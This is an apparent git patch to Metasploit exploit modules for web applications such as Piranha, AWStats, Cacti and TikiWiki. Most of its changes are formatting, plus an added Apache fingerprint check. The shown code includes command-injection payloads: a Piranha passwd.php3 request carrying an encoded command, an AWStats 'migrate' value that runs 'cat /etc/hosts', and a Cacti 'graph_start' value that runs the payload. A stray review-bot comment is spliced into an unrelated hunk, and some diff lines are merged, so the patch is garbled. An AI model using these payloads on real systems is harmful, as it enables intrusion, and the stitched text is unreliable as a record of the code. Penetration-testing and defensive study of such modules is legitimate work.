From a3d901a6b97c58aa623442bc23dfde004c6ea249 Mon Sep 17 00:00:00 2001
From: Joshua Drake
Date: Sat, 3 Jul 2010 06:21:31 +0000
Subject: [PATCH] various minor fixes, some added fingerprinting

git-svn-id: file:///home/svn/framework3/trunk@9671 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../linux/http/piranha_passwd_exec.rb | 6 +++
 .../exploits/multi/http/tomcat_mgr_deploy.rb | 1 -
 .../unix/http/contentkeeperweb_mimencode.rb | 42 +++++++++----------
 .../unix/webapp/awstats_migrate_exec.rb | 36 ++++++++--------
 .../unix/webapp/cacti_graphimage_exec.rb | 30 ++++++-------
 .../unix/webapp/coppermine_piceditor.rb | 2 +-
 .../unix/webapp/guestbook_ssi_exec.rb | 2 +-
 .../webapp/openview_connectednodes_exec.rb | 12 +++---
 modules/exploits/unix/webapp/php_include.rb | 1 -
 .../unix/webapp/php_vbulletin_template.rb | 42 +++++++++++--------
 .../unix/webapp/php_wordpress_lastpost.rb | 6 +--
 .../exploits/unix/webapp/php_xmlrpc_eval.rb | 11 +++--
 .../exploits/unix/webapp/phpbb_highlight.rb | 4 +-
 .../webapp/tikiwiki_graph_formula_exec.rb | 20 ++++-----
 .../unix/webapp/tikiwiki_jhot_exec.rb | 34 +++++++--------
 modules/exploits/unix/webapp/twiki_history.rb | 6 +--
 modules/exploits/unix/webapp/twiki_search.rb | 6 +--
 17 files changed, 135 insertions(+), 126 deletions(-)

diff --git a/modules/exploits/linux/http/piranha_passwd_exec.rb b/modules/exploits/linux/http/piranha_passwd_exec.rb
index aa3dfea751..7afd2177ed 100644
--- a/modules/exploits/linux/http/piranha_passwd_exec.rb
+++ b/modules/exploits/linux/http/piranha_passwd_exec.rb
@@ -63,6 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'Compat' =>
 {
 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'generic perl'
 }
 },
 'Targets' =>
@@ -80,6 +81,11 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 
 def exploit
+ info = http_fingerprint
+ if not (info =~ /Apache/)
+ raise RuntimeError, 'The target server is not running Apache.'
+ end
+
 cmd = Rex::Text.uri_encode(payload.encoded, 'hex-normal')
 str = "/piranha/secure/passwd.php3?try1=q+;#{cmd}&try2=q+;#{cmd}&passwd=ACCEPT"
 print_status("Sending GET request with encoded command line...")
diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb
index 3b95088813..94dd95b5c0 100644
--- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb
+++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb
@@ -83,7 +83,6 @@ class Metasploit3 < Msf::Exploit::Remote
 'Platform' => 'linux'
 },
 ],
-],
 'DefaultTarget' => 0,
 'DisclosureDate' => 'Nov 09 2009'))
 
diff --git a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb
index 7f709eb7cc..61e4a8867a 100644
--- a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb
+++ b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb
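Review bot: The new guard at the top of `exploit` is spelled `if not (info =~ /Apache/)`, which is the non-idiomatic form of `unless info =~ /Apache/`; writing it as `unless info.to_s.include?('Apache')` would also make explicit that a nil fingerprint (no usable Server header) is treated as a mismatch rather than leaning on `NilClass#=~`. Because the check is only a banner heuristic, the abort message should report what was actually observed so a false abort stays diagnosable, e.g. `raise RuntimeError, "The target server does not appear to be running Apache (fingerprint: #{info.inspect})"` — this assumes `http_fingerprint` returns a string banner, which the hunk does not show. The body of `exploit` continues past the end of the hunk.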
@@ -18,26 +18,26 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'ContentKeeper Web Remote Command Execution', - 'Description' => %q{ - This module exploits the ContentKeeper Web Appliance. Versions prior + 'Name' => 'ContentKeeper Web Remote Command Execution', + 'Description' => %q{ + This module exploits the ContentKeeper Web Appliance. Versions prior to 125.10 are affected. This module exploits a combination of weaknesses to enable remote command execution as the Apache user. Following exploitation it is possible to abuse an insecure PATH call to 'ps' etc in setuid 'benetool' to escalate to root. }, - 'Author' => [ 'patrick' ], - 'Arch' => [ ARCH_CMD ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - [ 'OSVDB', '54551'], - [ 'OSVDB', '54552'], - [ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ], - ], - 'Privileged' => false, - 'Payload' => + 'Author' => [ 'patrick' ], + 'Arch' => [ ARCH_CMD ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'OSVDB', '54551'], + [ 'OSVDB', '54552'], + [ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ], + ], + 'Privileged' => false, + 'Payload' => { 'DisableNops' => true, 'Space' => 1024, @@ -47,15 +47,15 @@ class Metasploit3 < Msf::Exploit::Remote 'RequiredCmd' => 'generic perl ruby telnet', } }, - 'Platform' => ['unix'], - 'Targets' => - [ - [ 'Automatic', { } ] - ], + 'Platform' => ['unix'], + 'Targets' => + [ + [ 'Automatic', { } ] + ], 'DisclosureDate' => 'Feb 25 2009', 'DefaultTarget' => 0)) - register_options( + register_options( [ Opt::RPORT(80), ],self.class) diff --git a/modules/exploits/unix/webapp/awstats_migrate_exec.rb b/modules/exploits/unix/webapp/awstats_migrate_exec.rb index f4e4282917..1603549b0f 100644 --- a/modules/exploits/unix/webapp/awstats_migrate_exec.rb +++ b/modules/exploits/unix/webapp/awstats_migrate_exec.rb 
@@ -23,10 +23,10 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'AWStats migrate Remote Command Execution', 'Description' => %q{ This module exploits an arbitrary command execution vulnerability in the - AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based - payloads are recommended with this module. The vulnerability is only - present when AllowToUpdateStatsFromBrowser is enabled in the AWstats - configuration file (non-default). + AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based + payloads are recommended with this module. The vulnerability is only + present when AllowToUpdateStatsFromBrowser is enabled in the AWstats + configuration file (non-default). }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, @@ -56,21 +56,21 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'May 04 2006', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('URI', [true, "The full URI path to awstats.pl", "/cgi-bin/awstats.pl"]), - OptString.new('AWSITE', [true, "The AWStats config site name", "demo"]), - ], self.class) + register_options( + [ + OptString.new('URI', [true, "The full URI path to awstats.pl", "/cgi-bin/awstats.pl"]), + OptString.new('AWSITE', [true, "The AWStats config site name", "demo"]), + ], self.class) end def check res = send_request_cgi({ 'uri' => datastore['URI'], 'vars_get' => - { - 'migrate' => "|echo;cat /etc/hosts;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt" - } - }, 25) + { + 'migrate' => "|echo;cat /etc/hosts;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt" + } + }, 25) if (res and res.body.match(/localhost/)) return Exploit::CheckCode::Vulnerable 
@@ -87,11 +87,11 @@ class Metasploit3 < Msf::Exploit::Remote
 'uri' => sploit,
 'method' => 'GET',
 'headers' =>
- {
- 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
- 'Connection' => 'Close',
- }
- }, 25)
+ {
+ 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
+ 'Connection' => 'Close',
+ }
+ }, 25)
 
 if (res)
 print_status("The server returned: #{res.code} #{res.message}")
diff --git a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb
index 4a192d39b0..ee5cd3a0de 100644
--- a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb
+++ b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb
@@ -30,8 +30,8 @@ class Metasploit3 < Msf::Exploit::Remote
 'Version' => '$Revision$',
 'References' =>
 [
- ['OSVDB', '17539'],
- ['BID', '14042'],
+ [ 'OSVDB', '17539' ],
+ [ 'BID', '14042' ],
 ],
 'Privileged' => false,
 'Payload' =>
@@ -50,10 +50,10 @@ class Metasploit3 < Msf::Exploit::Remote
 'DisclosureDate' => 'Jan 15 2005',
 'DefaultTarget' => 0))
 
- register_options(
- [
- OptString.new('URI', [true, "The full URI path to graph_view.php", "/cacti/graph_view.php"]),
- ], self.class)
+ register_options(
+ [
+ OptString.new('URI', [true, "The full URI path to graph_view.php", "/cacti/graph_view.php"]),
+ ], self.class)
 end
 
 def exploit
@@ -61,10 +61,10 @@ class Metasploit3 < Msf::Exploit::Remote
 res = send_request_cgi({
 'uri' => datastore['URI'],
 'vars_get' =>
- {
- 'action' => 'list'
- }
- }, 10)
+ {
+ 'action' => 'list'
+ }
+ }, 10)
 
 if (not res)
 print_error("The server gave no response")
@@ -81,11 +81,11 @@ class Metasploit3 < Msf::Exploit::Remote
 res = send_request_cgi({
 'uri' => datastore['URI'],
 'vars_get' =>
- {
- 'local_graph_id' => m[1],
- 'graph_start' => "\necho YYY;#{payload.encoded};echo YYY;echo\n"
- }
- }, 25)
+ {
+ 'local_graph_id' => m[1],
+ 'graph_start' => "\necho YYY;#{payload.encoded};echo YYY;echo\n"
+ }
+ }, 25)
 
 if (res)
 print_status("The server returned: #{res.code} #{res.message}")
diff --git a/modules/exploits/unix/webapp/coppermine_piceditor.rb b/modules/exploits/unix/webapp/coppermine_piceditor.rb
index 110bfe59c3..4a68394a50 100644
--- a/modules/exploits/unix/webapp/coppermine_piceditor.rb
+++ b/modules/exploits/unix/webapp/coppermine_piceditor.rb
@@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'quality' => '50', # not required, but fixes an error message
 'newimage' => img
 }
- }, 25)
+ }, 25)
 
 if (res and res.code == 200)
 print_status("Successfully POST'd exploit data")
diff --git a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb
index 1597900b0e..dcc3b84268 100644
--- a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb
+++ b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb
@@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote
 email = rand_text_alphanumeric(20)
 city = rand_text_alphanumeric(20)
 state = rand_text_alphanumeric(20)
- country = rand_text_alphanumeric(20)
+ country = rand_text_alphanumeric(20)
 sploit = Rex::Text.uri_encode("